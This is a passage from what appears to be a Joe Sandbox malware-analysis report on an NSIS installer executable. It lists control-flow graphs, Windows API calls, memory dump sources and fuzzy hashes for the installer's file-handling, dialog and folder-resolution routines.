405c2c-405c32 628->632 631->609 632->609
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B23
                                                                                                                • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B6B
                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B8E
                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405B94
                                                                                                                • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405BA4
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C44
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405C53
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                • String ID: 0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                • API String ID: 2035342205-1432729950
                                                                                                                • Opcode ID: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                                • Instruction ID: 490a569b50011677cd34e026f6ab1003dec3a9533e419df12a6715eb2ed0bc70
                                                                                                                • Opcode Fuzzy Hash: 94aee6277fb60bc187ec105b0c3c889327325094ff3d5538513028a918914a00
                                                                                                                • Instruction Fuzzy Hash: 0541BF30805B18A6EB31AB618D89BAF7678EF41718F10817BF801711D2D77C59C29EAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                                                                                                • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                                                                                                • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0), ref: 00406736
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00406742
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                • String ID: xgB
                                                                                                                • API String ID: 2295610775-399326502
                                                                                                                • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                                                                                                • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                                                                                • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 261 403e86-403e98 262 403fd9-403fe8 261->262 263 403e9e-403ea4 261->263 265 404037-40404c 262->265 266 403fea-404032 GetDlgItem * 2 call 40435f SetClassLongW call 40140b 262->266 263->262 264 403eaa-403eb3 263->264 269 403eb5-403ec2 SetWindowPos 264->269 270 403ec8-403ecb 264->270 267 40408c-404091 call 4043ab 265->267 268 40404e-404051 265->268 266->265 283 404096-4040b1 267->283 272 404053-40405e call 401389 268->272 273 404084-404086 268->273 269->270 275 403ee5-403eeb 270->275 276 403ecd-403edf ShowWindow 270->276 272->273 294 404060-40407f SendMessageW 272->294 273->267 282 40432c 273->282 278 403f07-403f0a 275->278 279 403eed-403f02 DestroyWindow 275->279 276->275 287 403f0c-403f18 SetWindowLongW 278->287 288 403f1d-403f23 278->288 284 404309-40430f 279->284 286 40432e-404335 282->286 290 4040b3-4040b5 call 40140b 283->290 291 4040ba-4040c0 283->291 284->282 296 404311-404317 284->296 287->286 292 403fc6-403fd4 call 4043c6 288->292 293 403f29-403f3a GetDlgItem 288->293 290->291 297 4040c6-4040d1 291->297 298 4042ea-404303 DestroyWindow EndDialog 291->298 292->286 300 403f59-403f5c 293->300 301 403f3c-403f53 SendMessageW IsWindowEnabled 293->301 294->286 296->282 303 404319-404322 ShowWindow 296->303 297->298 299 4040d7-404124 call 40640a call 40435f * 3 GetDlgItem 297->299 298->284 331 404126-40412b 299->331 332 40412e-40416a ShowWindow KiUserCallbackDispatcher call 404381 EnableWindow 299->332 305 403f61-403f64 300->305 306 403f5e-403f5f 300->306 301->282 301->300 303->282 310 403f72-403f77 305->310 311 403f66-403f6c 305->311 309 403f8f-403f94 call 404338 306->309 309->292 314 403fad-403fc0 SendMessageW 310->314 316 403f79-403f7f 310->316 311->314 315 403f6e-403f70 311->315 314->292 315->309 319 403f81-403f87 call 40140b 316->319 320 403f96-403f9f call 40140b 316->320 327 403f8d 319->327 320->292 329 403fa1-403fab 320->329 327->309 329->327 331->332 335 40416c-40416d 332->335 336 40416f 332->336 337 404171-40419f GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 4041a1-4041b2 SendMessageW 337->338 339 4041b4 337->339 340 4041ba-4041f9 call 404394 call 403e67 call 4063e8 lstrlenW call 40640a SetWindowTextW call 401389 338->340 339->340 340->283 351 4041ff-404201 340->351 351->283 352 404207-40420b 351->352 353 40422a-40423e DestroyWindow 352->353 354 40420d-404213 352->354 353->284 356 404244-404271 CreateDialogParamW 353->356 354->282 355 404219-40421f 354->355 355->283 357 404225 355->357 356->284 358 404277-4042ce call 40435f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->282 358->282 363 4042d0-4042e8 ShowWindow call 4043ab 358->363 363->284
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404147
                                                                                                                • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404197
                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                                                                                                • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                • String ID: (7B
                                                                                                                • API String ID: 3282139019-3251261122
                                                                                                                • Opcode ID: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                                                                                                • Opcode Fuzzy Hash: 42b69af187e06dbbd4ac4a762ea4715538cd3e369663267481291b142cb35f12
                                                                                                                • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 366 403ad8-403af0 call 4067c2 369 403af2-403b02 call 40632f 366->369 370 403b04-403b3b call 4062b6 366->370 379 403b5e-403b87 call 403dae call 405dc5 369->379 375 403b53-403b59 lstrcatW 370->375 376 403b3d-403b4e call 4062b6 370->376 375->379 376->375 384 403c19-403c21 call 405dc5 379->384 385 403b8d-403b92 379->385 391 403c23-403c2a call 40640a 384->391 392 403c2f-403c54 LoadImageW 384->392 385->384 386 403b98-403bb2 call 4062b6 385->386 390 403bb7-403bc0 386->390 390->384 393 403bc2-403bc6 390->393 391->392 395 403cd5-403cdd call 40140b 392->395 396 403c56-403c86 RegisterClassW 392->396 397 403bd8-403be4 lstrlenW 393->397 398 403bc8-403bd5 call 405cea 393->398 407 403ce7-403cf2 call 403dae 395->407 408 403cdf-403ce2 395->408 399 403da4 396->399 400 403c8c-403cd0 SystemParametersInfoW CreateWindowExW 396->400 405 403be6-403bf4 lstrcmpiW 397->405 406 403c0c-403c14 call 405cbd call 4063e8 397->406 398->397 404 403da6-403dad 399->404 400->395 405->406 411 403bf6-403c00 GetFileAttributesW 405->411 406->384 419 403cf8-403d12 ShowWindow call 406752 407->419 420 403d7b-403d83 call 405523 407->420 408->404 414 403c02-403c04 411->414 415 403c06-403c07 call 405d09 411->415 414->406 414->415 415->406 427 403d14-403d19 call 406752 419->427 428 403d1e-403d30 GetClassInfoW 419->428 425 403d85-403d8b 420->425 426 403d9d-403d9f call 40140b 420->426 425->408 429 403d91-403d98 call 40140b 425->429 426->399 427->428 432 403d32-403d42 GetClassInfoW RegisterClassW 428->432 433 403d48-403d6b DialogBoxParamW call 40140b 428->433 429->408 432->433 437 403d70-403d79 call 403a28 433->437 437->404
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                                  • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,75573420,00435000,00000000), ref: 00403B59
                                                                                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BD9
                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,00435800,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                                                                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403BF7
                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                                                                                  • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                                                                                                • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C95
                                                                                                                • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                                                                                                • RegisterClassW.USER32(004291E0), ref: 00403D42
                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                • String ID: (7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                • API String ID: 1975747703-1642274604
                                                                                                                • Opcode ID: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                                • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                                                                                                • Opcode Fuzzy Hash: faef508d5617ccaf29f7204e00c3b9242aa942859a9d4d687d906c1b184c1908
                                                                                                                • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 440 402f30-402f7e GetTickCount GetModuleFileNameW call 405ede 443 402f80-402f85 440->443 444 402f8a-402fb8 call 4063e8 call 405d09 call 4063e8 GetFileSize 440->444 445 4031cf-4031d3 443->445 452 4030a8-4030b6 call 402e8e 444->452 453 402fbe-402fd5 444->453 459 403187-40318c 452->459 460 4030bc-4030bf 452->460 455 402fd7 453->455 456 402fd9-402fe6 call 403447 453->456 455->456 464 403143-40314b call 402e8e 456->464 465 402fec-402ff2 456->465 459->445 462 4030c1-4030d9 call 40345d call 403447 460->462 463 4030eb-403137 GlobalAlloc call 406923 call 405f0d CreateFileW 460->463 462->459 492 4030df-4030e5 462->492 489 403139-40313e 463->489 490 40314d-40317d call 40345d call 4031d6 463->490 464->459 469 403072-403076 465->469 470 402ff4-40300c call 405e99 465->470 473 403078-40307e call 402e8e 469->473 474 40307f-403085 469->474 470->474 485 40300e-403015 470->485 473->474 481 403087-403095 call 4068b5 474->481 482 403098-4030a2 474->482 481->482 482->452 482->453 485->474 491 403017-40301e 485->491 489->445 500 403182-403185 490->500 491->474 493 403020-403027 491->493 492->459 492->463 493->474 495 403029-403030 493->495 495->474 497 403032-403052 495->497 497->459 499 403058-40305c 497->499 501 403064-40306c 499->501 502 40305e-403062 499->502 500->459 503 40318e-40319f 500->503 501->474 504 40306e-403070 501->504 502->452 502->501 505 4031a1 503->505 506 4031a7-4031ac 503->506 504->474 505->506 507 4031ad-4031b3 506->507 507->507 508 4031b5-4031cd call 405e99 507->508 508->445
                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 00402F44
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\czHx16QwGQ.exe,?), ref: 00402F60
                                                                                                                  • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\czHx16QwGQ.exe,80000000,00000003), ref: 00405EE2
                                                                                                                  • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\czHx16QwGQ.exe,C:\Users\user\Desktop\czHx16QwGQ.exe,80000000,00000003), ref: 00402FA9
                                                                                                                • GlobalAlloc.KERNELBASE(?,0040A230), ref: 004030F0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\czHx16QwGQ.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                • API String ID: 2803837635-5965627
                                                                                                                • Opcode ID: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                                                                                                • Opcode Fuzzy Hash: 17d4548877bb422f8be7689a7878bb05eb645905850902383813b6e2c7289b3d
                                                                                                                • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 511 40640a-406415 512 406417-406426 511->512 513 406428-40643e 511->513 512->513 514 406444-406451 513->514 515 406656-40665c 513->515 514->515 518 406457-40645e 514->518 516 406662-40666d 515->516 517 406463-406470 515->517 519 406678-406679 516->519 520 40666f-406673 call 4063e8 516->520 517->516 521 406476-406482 517->521 518->515 520->519 523 406643 521->523 524 406488-4064c6 521->524 527 406651-406654 523->527 528 406645-40664f 523->528 525 4065e6-4065ea 524->525 526 4064cc-4064d7 524->526 529 4065ec-4065f2 525->529 530 40661d-406621 525->530 531 4064f0 526->531 532 4064d9-4064de 526->532 527->515 528->515 533 406602-40660e call 4063e8 529->533 534 4065f4-406600 call 40632f 529->534 536 406630-406641 lstrlenW 530->536 537 406623-40662b call 40640a 530->537 535 4064f7-4064fe 531->535 532->531 538 4064e0-4064e3 532->538 549 406613-406619 533->549 534->549 541 406500-406502 535->541 542 406503-406505 535->542 536->515 537->536 538->531 539 4064e5-4064e8 538->539 539->531 545 4064ea-4064ee 539->545 541->542 547 406540-406543 542->547 548 406507-40652e call 4062b6 542->548 545->535 552 406553-406556 547->552 553 406545-406551 GetSystemDirectoryW 547->553 559 406534-40653b call 40640a 548->559 560 4065ce-4065d1 548->560 549->536 551 40661b 549->551 555 4065de-4065e4 call 40667c 551->555 557 4065c1-4065c3 552->557 558 406558-406566 GetWindowsDirectoryW 552->558 556 4065c5-4065c9 553->556 555->536 556->555 562 4065cb 556->562 557->556 561 406568-406572 557->561 558->557 559->556 560->555 567 4065d3-4065d9 lstrcatW 560->567 564 406574-406577 561->564 565 40658c-4065a2 SHGetSpecialFolderLocation 561->565 562->560 564->565 569 406579-406580 564->569 570 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 565->570 571 4065bd 565->571 567->555 573 406588-40658a 569->573 570->556 570->571 571->557 573->556 573->565
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,?), ref: 0040654B
                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,?,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                                • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                                • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                • API String ID: 717251189-1230650788
                                                                                                                • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                                • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                                • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                                • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
